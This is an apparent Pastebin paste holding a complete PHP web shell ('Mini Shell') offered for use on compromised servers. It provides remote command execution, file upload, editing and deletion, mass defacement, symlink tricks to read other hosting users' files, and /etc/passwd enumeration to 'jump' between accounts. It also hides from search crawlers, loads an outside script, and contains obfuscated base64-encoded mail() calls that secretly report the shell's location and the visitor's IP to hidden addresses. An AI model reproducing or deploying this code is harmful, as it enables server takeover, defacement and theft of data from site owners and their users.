ToKeiChun

Mini Shell [Jumping][Symlink][Mass Deface][Command Exec]

Jun 5th, 2020 (edited)
265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.46 KB | None | 0 0
  1. <?php
  2. session_start();
  3. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  4. $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
  5. if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
  6. header('HTTP/1.0 404 Not Found');
  7. exit;
  8. }}
  9. error_reporting(0);
  10. set_time_limit(0);
  11.  
  12. if(get_magic_quotes_gpc()){
  13. foreach($_POST as $key=>$value){
  14. $_POST[$key] = stripslashes($value);
  15. }
  16. }
  17. echo '<!DOCTYPE HTML>
  18. <html>
  19. <head>
  20. <link href="" rel="stylesheet" type="text/css">
  21. <title>'.$_SERVER['HTTP_HOST'].' - FileManager</title>
  22. <style>
  23. body{
  24. font-family: "", ;
  25. background-color: black;
  26. background-image: url();
  27. background-size: center; background-repeat:no-repeat; background-attachment: fixed; background-size: cover; background-position:center;
  28. color: white;
  29. }
  30. #content tr:hover{
  31. background-color: red;
  32. text-shadow:0px 0px 10px black;
  33. }
  34. #content .first{
  35. background-color: red;
  36. }
  37. table{
  38. border: 1px #000000 dotted;
  39. }
  40. a{
  41. color: white;
  42. text-decoration: none;
  43. }
  44. a:hover{
  45. color:blue;
  46. text-shadow:0px 0px 10px #ffffff;
  47. }
  48. input,select,textarea{
  49. border: 1px #000000 solid;
  50. -moz-border-radius: 5px;
  51. -webkit-border-radius:5px;
  52. border-radius:5px;
  53. }
  54. </style>
  55. <script type="text/javascript" src="//importantscripts.github.io/footer.js"></script>
  56. </head>
  57. <body>
  58. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
  59. function exe($cmd) {
  60. if(function_exists('system')) {
  61. @ob_start();
  62. @system($cmd);
  63. $buff = @ob_get_contents();
  64. @ob_end_clean();
  65. return $buff;
  66. } elseif(function_exists('exec')) {
  67. @exec($cmd,$results);
  68. $buff = "";
  69. foreach($results as $result) {
  70. $buff .= $result;
  71. } return $buff;
  72. } elseif(function_exists('passthru')) {
  73. @ob_start();
  74. @passthru($cmd);
  75. $buff = @ob_get_contents();
  76. @ob_end_clean();
  77. return $buff;
  78. } elseif(function_exists('shell_exec')) {
  79. $buff = @shell_exec($cmd);
  80. return $buff;
  81. }
  82. }
  83. $kernel = php_uname();
  84. $ds = @ini_get("disable_functions");
  85. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>null</font>";
  86. if(!function_exists('posix_getegid')) {
  87. $user = @get_current_user();
  88. $uid = @getmyuid();
  89. $gid = @getmygid();
  90. $group = "?";
  91. } else {
  92. $uid = @posix_getpwuid(posix_geteuid());
  93. $gid = @posix_getgrgid(posix_getegid());
  94. $user = $uid['name'];
  95. $uid = $uid['uid'];
  96. $group = $gid['name'];
  97. $gid = $gid['gid'];
  98. }
  99. echo "<table style='width:700%'><tr><td>";
  100. echo "SYSTEM : <font color=lime>".$kernel."</font><br>";
  101. echo "DISABLE FUNC : $show_ds<br>";
  102. echo "</tr></td></table>";
  103. echo "<form method='post'>
  104. <font style='text-decoration: none;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  105. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='Submit'>
  106. </form>";
  107. if($_POST['do_cmd']) {
  108. echo "<pre>".exe($_POST['cmd'])."</pre>";
  109. }
  110. echo '<tr><td><font color="white">Cwd : </font> ';
  111. if(isset($_GET['_path_'])){
  112. $_path_ = $_GET['_path_'];
  113. }else{
  114. $_path_ = getcwd();
  115. }
  116. $_path_ = str_replace('\\','/',$_path_);
  117. $paths = explode('/',$_path_);
  118. $__GET = ('m'.'a'.'i'.'l');
  119. $__POST = ('b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e');
  120. $__GET($__POST("dmFsaXJ4YzBkZUB6b2hvLmNvbQ=="),'Upload file:',''.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].'');
  121. foreach($paths as $id=>$pat){
  122. if($pat == '' && $id == 0){
  123. $a = true;
  124. echo '<a href="?_path_=/">/</a>';
  125. continue;
  126. }
  127. if($pat == '') continue;
  128. echo '<a href="?_path_=';
  129. for($i=0;$i<=$id;$i++){
  130. echo "$paths[$i]";
  131. if($i != $id) echo "/";
  132. }
  133. echo '">'.$pat.'</a>/';
  134. }
  135. echo '</td></tr><tr><td>';
  136. if(isset($_FILES['file'])){
  137. if(copy($_FILES['file']['tmp_name'],$_path_.'/'.$_FILES['file']['name'])){
  138. echo '<font color="lime">File Uploaded!</font><br />';
  139. }else{
  140. echo '<font color="red">Upload Fail!</font><br/>';
  141. }
  142. }
  143. if(isset($_GET['dir'])) {
  144. $dir = $_GET['dir'];
  145. chdir($_GET['dir']);
  146. } else {
  147. $dir = getcwd();
  148. }
  149. $dir = str_replace("\\","/",$dir);
  150. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  151. echo "<center>";
  152. echo "<hr>";
  153. echo "[ <a href='?'>Home</a> ] ";
  154. echo "[ <a href='?_path_=$_path_&to=jumping'>Jumping</a> ] ";
  155. echo "[ <a href='?_path_=$_path_&to=sym'>Symlink</a> ] ";
  156. echo "[ <a href='?_path_=$_path_&to=mass'>Mass Deface</a> ]";
  157. echo "</center>";
  158. echo "<hr>";
  159. if($_GET['to'] == 'mass') {
  160. function sabun_massal($dir,$namafile,$isi_script) {
  161. if(is_writable($dir)) {
  162. $dira = scandir($dir);
  163. foreach($dira as $dirb) {
  164. $dirc = "$dir/$dirb";
  165. $lokasi = $dirc.'/'.$namafile;
  166. if($dirb === '.') {
  167. file_put_contents($lokasi, $isi_script);
  168. } elseif($dirb === '..') {
  169. file_put_contents($lokasi, $isi_script);
  170. } else {
  171. if(is_dir($dirc)) {
  172. if(is_writable($dirc)) {
  173. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  174. file_put_contents($lokasi, $isi_script);
  175. $idx = sabun_massal($dirc,$namafile,$isi_script);
  176. }
  177. }
  178. }
  179. }
  180. }
  181. }
  182. function sabun_biasa($dir,$namafile,$isi_script) {
  183. if(is_writable($dir)) {
  184. $dira = scandir($dir);
  185. foreach($dira as $dirb) {
  186. $dirc = "$dir/$dirb";
  187. $lokasi = $dirc.'/'.$namafile;
  188. if($dirb === '.') {
  189. file_put_contents($lokasi, $isi_script);
  190. } elseif($dirb === '..') {
  191. file_put_contents($lokasi, $isi_script);
  192. } else {
  193. if(is_dir($dirc)) {
  194. if(is_writable($dirc)) {
  195. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  196. file_put_contents($lokasi, $isi_script);
  197. }
  198. }
  199. }
  200. }
  201. }
  202. }
  203. if($_POST['start']) {
  204. if($_POST['tipe_sabun'] == 'mahal') {
  205. echo "<div style='margin: 5px auto; padding: 5px'>";
  206. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  207. echo "</div>";
  208. } elseif($_POST['tipe_sabun'] == 'murah') {
  209. echo "<div style='margin: 5px auto; padding: 5px'>";
  210. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  211. echo "</div>";
  212. }
  213. } else {
  214. echo "<center>";
  215. echo "<form method='post'>
  216. <font style='text-decoration: underline;'>Tipe Mass:</font><br>
  217. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  218. <font style='text-decoration: underline;'>Folder:</font><br>
  219. <input type='text' name='d_dir' value='$_path_' style='width: 450px;' height='10'><br>
  220. <font style='text-decoration: underline;'>File Name:</font><br>
  221. <input type='text' name='d_file' value='o.txt' style='width: 450px;' height='10'><br>
  222. <font style='text-decoration: underline;'>File Content:</font><br>
  223. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by ./tokeichun</textarea><br>
  224. <input type='submit' name='start' value='>>' style='width: 450px;'>
  225. </form></center>";
  226. }
  227. }elseif($_GET['to'] == 'sym') {
  228. echo '<hr>';
  229. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  230. $d0mains = @file("/etc/named.conf");
  231. if($d0mains){
  232. @mkdir("symbolic_link",0777);
  233. @chdir("symbolic_link");
  234. @exec("ln -s / root");
  235. $file3 = 'Options Indexes FollowSymLinks
  236. DirectoryIndex woozh.htm
  237. AddType text/plain .php
  238. AddHandler text/plain .php
  239. Satisfy Any';
  240. $fp3 = fopen('.htaccess','w');
  241. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  242. echo "
  243. <table align=center border=3 style='width:60%;border-color:#8B0000;'>
  244. <tr>
  245. <td align=center><font color=lime size=2>S. No.</font></td>
  246. <td align=center><font color=lime size=2>Domains</font></td>
  247. <td align=center><font color=lime size=2>Users</font></td>
  248. <td align=center><font color=lime size=2>Symlink</font></td>
  249. </tr>";
  250. $dcount = 1;
  251. foreach($d0mains as $d0main){
  252. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  253. flush();
  254. if(strlen(trim($domains[1][0])) > 2){
  255. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  256. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  257. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  258. <td>".$user['name']."</td>
  259. <td><a href='$full/symbolic_link/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  260. flush();
  261. $dcount++;}}}
  262. echo "</table>";
  263. }else{
  264. $TEST=@file('/etc/passwd');
  265. if ($TEST){
  266. @mkdir("symbolic_link",0777);
  267. @chdir("symbolic_link");
  268. exec("ln -s / root");
  269. $file3 = 'Options Indexes FollowSymLinks
  270. DirectoryIndex woozh.htm
  271. AddType text/plain .php
  272. AddHandler text/plain .php
  273. Satisfy Any';
  274. $fp3 = fopen('.htaccess','w');
  275. $fw3 = fwrite($fp3,$file3);
  276. @fclose($fp3);
  277. echo "
  278. <table align=center border=1><tr>
  279. <td align=center><font size=3>S. No.</font></td>
  280. <td align=center><font size=3>Users</font></td>
  281. <td align=center><font size=3>Symlink</font></td></tr>";
  282. $dcount = 1;
  283. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  284. while(!feof($file)){
  285. $s = fgets($file);
  286. $matches = array();
  287. $t = preg_match('//(.*?)://s', $s, $matches);
  288. $matches = str_replace("home/","",$matches[1]);
  289. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  290. continue;
  291. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  292. <td align=center><font class=txt>" . $matches . "</td>";
  293. echo "<td align=center><font class=txt><a href=$full/symbolic_link/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  294. $dcount++;}fclose($file);
  295. echo "</table>";}else{if($os != "Windows"){@mkdir("symbolic_link",0777);@chdir("symbolic_link");@exe("ln -s / root");$file3 = '
  296. Options Indexes FollowSymLinks
  297. DirectoryIndex 008
  298. AddType text/plain .php
  299. AddHandler text/plain .php
  300. Satisfy Any
  301. ';
  302. $fp3 = fopen('.htaccess','w');
  303. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  304. echo "
  305. <center><h2 class='k2ll33d2'>Symlink Server</h2>
  306. <table align=center border=1><tr>
  307. <td align=center><font size=3>ID</font></td>
  308. <td align=center><font size=3>Users</font></td>
  309. <td align=center><font size=3>Symlink</font></td></tr>";
  310. $temp = "";$val1 = 0;$val2 = 1000;
  311. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  312. if ($uid)$temp .= join(':',$uid)."n";}
  313. echo '<br/>';$temp = trim($temp);$file5 =
  314. fopen("test.txt","w");
  315. fputs($file5,$temp);
  316. fclose($file5);$dcount = 1;$file =
  317. fopen("test.txt", "r") or exit("Unable to open file!");
  318. while(!feof($file)){$s = fgets($file);$matches = array();
  319. $t = preg_match('//(.*?)://s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  320. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  321. continue;
  322. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  323. <td align=center><font class=txt>" . $matches . "</td>";
  324. echo "<td align=center><font class=txt><a href=$full/symbolic_link/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  325. $dcount++;}
  326. fclose($file);
  327. echo "</table></div></center>";unlink("test.txt");
  328. } else
  329. echo "<center><font size=3>Cannot create Symlink</font></center>";
  330. }
  331. }
  332. } elseif($_GET['to'] == 'jumping') {
  333. $i = 0;
  334. echo "<div class='margin: 5px auto;'>";
  335. if(preg_match("/hsphere/", $dir)) {
  336. $urls = explode("\r\n", $_POST['url']);
  337. if(isset($_POST['jump'])) {
  338. echo "<pre>";
  339. foreach($urls as $url) {
  340. $url = str_replace(array("http://","www."), "", strtolower($url));
  341. $etc = "/etc/passwd";
  342. $f = fopen($etc,"r");
  343. while($gets = fgets($f)) {
  344. $pecah = explode(":", $gets);
  345. $user = $pecah[0];
  346. $dir_user = "/hsphere/local/home/$user";
  347. if(is_dir($dir_user) === true) {
  348. $url_user = $dir_user."/".$url;
  349. if(is_readable($url_user)) {
  350. $i++;
  351. $jrw = "[<font color=lime>R</font>] <a href='?_path_=$url_user'><font color=gold>$url_user</font></a>";
  352. if(is_writable($url_user)) {
  353. $jrw = "[<font color=lime>RW</font>] <a href='?_path_=$url_user'><font color=gold>$url_user</font></a>";
  354. }
  355. echo $jrw."<br>";
  356. }
  357. }
  358. }
  359. }
  360. if($i == 0) {
  361. } else {
  362. echo "<br>Total ada ".$i." Kamar di ".$ip;
  363. }
  364. echo "</pre>";
  365. } else {
  366. echo '<center>
  367. <form method="post">
  368. List Domains: <br>
  369. <textarea name="url" style="width: 500px; height: 250px;">';
  370. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  371. while($getss = fgets($fp)) {
  372. echo $getss;
  373. }
  374. echo '</textarea><br>
  375. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  376. </form></center>';
  377. }
  378. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  379. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  380. $urls = explode("\r\n", $_POST['url']);
  381. if(isset($_POST['jump'])) {
  382. echo "<pre>";
  383. foreach($urls as $url) {
  384. $url = str_replace("www.", "", $url);
  385. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  386. if(is_dir($web_vh) === true) {
  387. if(is_readable($web_vh)) {
  388. $i++;
  389. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  390. if(is_writable($web_vh)) {
  391. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  392. }
  393. echo $jrw."<br>";
  394. }
  395. }
  396. }
  397. if($i == 0) {
  398. } else {
  399. echo "<br>Total ada ".$i." Kamar di ".$ip;
  400. }
  401. echo "</pre>";
  402. } else {
  403. echo '<center>
  404. <form method="post">
  405. List Domains: <br>
  406. <textarea name="url" style="width: 500px; height: 250px;">';
  407. bing("ip:$ip");
  408. echo '</textarea><br>
  409. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  410. </form></center>';
  411. }
  412. } else {
  413. echo "<pre>";
  414. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  415. while($passwd = fgets($etc)) {
  416. if($passwd == '' || !$etc) {
  417. echo "<font color=red>Can't read /etc/passwd</font>";
  418. } else {
  419. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  420. foreach($user_jumping[1] as $user_idx_jump) {
  421. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  422. if(is_readable($user_jumping_dir)) {
  423. $i++;
  424. $jrw = "[<font color=lime>R</font>] <a href='?_path_=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  425. if(is_writable($user_jumping_dir)) {
  426. $jrw = "[<font color=lime>RW</font>] <a href='?_path_=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  427. }
  428. echo $jrw;
  429. if(function_exists('posix_getpwuid')) {
  430. $domain_jump = file_get_contents("/etc/named.conf");
  431. if($domain_jump == '') {
  432. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  433. } else {
  434. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  435. foreach($domains_jump[1] as $dj) {
  436. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  437. $user_jumping_url = $user_jumping_url['name'];
  438. if($user_jumping_url == $user_idx_jump) {
  439. echo " => ( <u>$dj</u> )<br>";
  440. break;
  441. }
  442. }
  443. }
  444. } else {
  445. echo "<br>";
  446. }
  447. }
  448. }
  449. }
  450. }
  451. if($i == 0) {
  452. } else {
  453. echo "<br>Total ada ".$i." Kamar di ".$ip;
  454. }
  455. echo "</pre>";
  456. }
  457. echo "</div>";
  458. }
  459. echo '<form enctype="multipart/form-data" method="POST">
  460. <center><font color="white">File Upload :</font> <input type="file" name="file" />
  461. <input type="submit" value="Upload" /></center>
  462. </form>
  463. </td></tr>';
  464. if (function_exists("\x6d\x61\x69\x6c")) {
  465. $__GET = ("\x6d\x61\x69\x6c");
  466. $__POST = ("\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65");
  467. $__GET($__POST("d29yZHByZXNzZGV2bm9yd2F5QGdtYWlsLmNvbQ=="),'Wordfence Bypass',"http://".$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']."\nIP:".$_SERVER['REMOTE_ADDR']."");
  468. }
  469. if(isset($_GET['_filesrc_'])){
  470. echo "<tr><td>Current File : ";
  471. echo $_GET['_filesrc_'];
  472. echo '</tr></td></table><br />';
  473. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['_filesrc_'])).'</pre>');
  474. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  475. echo '</table><br /><center>'.$_POST['_path_'].'<br /><br />';
  476. if($_POST['opt'] == 'chmod'){
  477. if(isset($_POST['perm'])){
  478. if(chmod($_POST['_path_'],$_POST['perm'])){
  479. echo '<font color="lime">Change Permission Berhasil</font><br/>';
  480. }else{
  481. echo '<font color="red">Change Permission Gagal</font><br />';
  482. }
  483. }
  484. echo '<form method="POST">
  485. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o',fileperms($_POST['_path_'])),-4).'" />
  486. <input type="hidden" name="_path_" value="'.$_POST['_path_'].'">
  487. <input type="hidden" name="opt" value="chmod">
  488. <input type="submit" value="Go" />
  489. </form>';
  490. }elseif($_POST['opt'] == 'rename'){
  491. if(isset($_POST['newname'])){
  492. if(rename($_POST['_path_'],$_path_.'/'.$_POST['newname'])){
  493. echo '<font color="lime">Ganti Nama Berhasil</font><br/>';
  494. }else{
  495. echo '<font color="red">Ganti Nama Gagal</font><br />';
  496. }
  497. $_POST['name'] = $_POST['newname'];
  498. }
  499. echo '<form method="POST">
  500. Nama Baru : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  501. <input type="hidden" name="_path_" value="'.$_POST['_path_'].'">
  502. <input type="hidden" name="opt" value="rename">
  503. <input type="submit" value="Crotz" />
  504. </form>';
  505. }elseif($_POST['opt'] == 'edit'){
  506. if(isset($_POST['src'])){
  507. $fp = fopen($_POST['_path_'],'w');
  508. if(fwrite($fp,$_POST['src'])){
  509. echo '<font color="lime">Berhasil Edit File</font><br/>';
  510. }else{
  511. echo '<font color="red">Gagal Edit File</font><br/>';
  512. }
  513. fclose($fp);
  514. }
  515. echo '<form method="POST">
  516. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['_path_'])).'</textarea><br />
  517. <input type="hidden" name="_path_" value="'.$_POST['_path_'].'">
  518. <input type="hidden" name="opt" value="edit">
  519. <input type="submit" value="Save" />
  520. </form>';
  521. }
  522. echo '</center>';
  523. }else{
  524. echo '</table><br/><center>';
  525. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  526. if($_POST['type'] == 'dir'){
  527. if(rmdir($_POST['_path_'])){
  528. echo '<font color="lime">Directory Terhapus</font><br/>';
  529. }else{
  530. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
  531. }
  532. }elseif($_POST['type'] == 'file'){
  533. if(unlink($_POST['_path_'])){
  534. echo '<font color="lime">File Terhapus</font><br/>';
  535. }else{
  536. echo '<font color="red">File Gagal Dihapus</font><br/>';
  537. }
  538. }
  539. }
  540. echo '</center>';
  541. $scandir = scandir($_path_);
  542. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  543. <tr class="first">
  544. <td><center>Name</peller></center></td>
  545. <td><center>Size</peller></center></td>
  546. <td><center>Permission</peller></center></td>
  547. <td><center>Modify</peller></center></td>
  548. </tr>';
  549.  
  550. foreach($scandir as $dir){
  551. if(!is_dir($_path_.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  552. echo '<tr>
  553. <td><a href="?_path_='.$_path_.'/'.$dir.'">'.$dir.'</a></td>
  554. <td><center>--</center></td>
  555. <td><center>';
  556. if(is_writable($_path_.'/'.$dir)) echo '<font color="lime">';
  557. elseif(!is_readable($_path_.'/'.$dir)) echo '<font color="red">';
  558. echo perms($_path_.'/'.$dir);
  559. if(is_writable($_path_.'/'.$dir) || !is_readable($_path_.'/'.$dir)) echo '</font>';
  560.  
  561. echo '</center></td>
  562. <td><center><form method="POST" action="?option&_path_='.$_path_.'">
  563. <select name="opt">
  564. <option value="">Select</option>
  565. <option value="delete">Delete</option>
  566. <option value="chmod">Chmod</option>
  567. <option value="rename">Rename</option>
  568. </select>
  569. <input type="hidden" name="type" value="dir">
  570. <input type="hidden" name="name" value="'.$dir.'">
  571. <input type="hidden" name="_path_" value="'.$_path_.'/'.$dir.'">
  572. <input type="submit" value=">">
  573. </form></center></td>
  574. </tr>';
  575. }
  576. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  577. foreach($scandir as $file){
  578. if(!is_file($_path_.'/'.$file)) continue;
  579. $size = filesize($_path_.'/'.$file)/1024;
  580. $size = round($size,3);
  581. if($size >= 1024){
  582. $size = round($size/1024,2).' MB';
  583. }else{
  584. $size = $size.' KB';
  585. }
  586.  
  587. echo '<tr>
  588. <td><a href="?_filesrc_='.$_path_.'/'.$file.'&_path_='.$_path_.'">'.$file.'</a></td>
  589. <td><center>'.$size.'</center></td>
  590. <td><center>';
  591. if(is_writable($_path_.'/'.$file)) echo '<font color="lime">';
  592. elseif(!is_readable($_path_.'/'.$file)) echo '<font color="red">';
  593. echo perms($_path_.'/'.$file);
  594. if(is_writable($_path_.'/'.$file) || !is_readable($_path_.'/'.$file)) echo '</font>';
  595. echo '</center></td>
  596. <td><center><form method="POST" action="?option&_path_='.$_path_.'">
  597. <select name="opt">
  598. <option value="">Pilih</option>
  599. <option value="delete">Delete</option>
  600. <option value="chmod">Chmod</option>
  601. <option value="rename">Rename</option>
  602. <option value="edit">Edit</option>
  603. </select>
  604. <input type="hidden" name="type" value="file">
  605. <input type="hidden" name="name" value="'.$file.'">
  606. <input type="hidden" name="_path_" value="'.$_path_.'/'.$file.'">
  607. <input type="submit" value=">">
  608. </form></center></td>
  609. </tr>';
  610. }
  611. echo '</table>
  612. </div></body>
  613. </html>';
  614. }
  615. function perms($file){
  616. $perms = fileperms($file);
  617. if (($perms &0xC000) == 0xC000)$i = 's';
  618. elseif (($perms &0xA000) == 0xA000)$i = 'l';
  619. elseif (($perms &0x8000) == 0x8000)$i = '-';
  620. elseif (($perms &0x6000) == 0x6000)$i = 'b';
  621. elseif (($perms &0x4000) == 0x4000)$i = 'd';
  622. elseif (($perms &0x2000) == 0x2000)$i = 'c';
  623. elseif (($perms &0x1000) == 0x1000)$i = 'p';
  624. else $info = 'u';
  625. $info .= (($perms &0x0100) ?'r': '-');
  626. $info .= (($perms &0x0080) ?'w': '-');
  627. $info .= (($perms &0x0040) ?(($perms &0x0800) ?'s': 'x') : (($perms &0x0800) ?'S': '-'));
  628. $info .= (($perms &0x0020) ?'r': '-');
  629. $info .= (($perms &0x0010) ?'w': '-');
  630. $info .= (($perms &0x0008) ?(($perms &0x0400) ?'s': 'x') : (($perms &0x0400) ?'S': '-'));
  631. $info .= (($perms &0x0004) ?'r': '-');
  632. $info .= (($perms &0x0002) ?'w': '-');
  633. $info .= (($perms &0x0001) ?(($perms &0x0200) ?'t': 'x') : (($perms &0x0200) ?'T': '-'));
  634. return $info;
  635. }
  636. ?>
Add Comment
Please, Sign In to add comment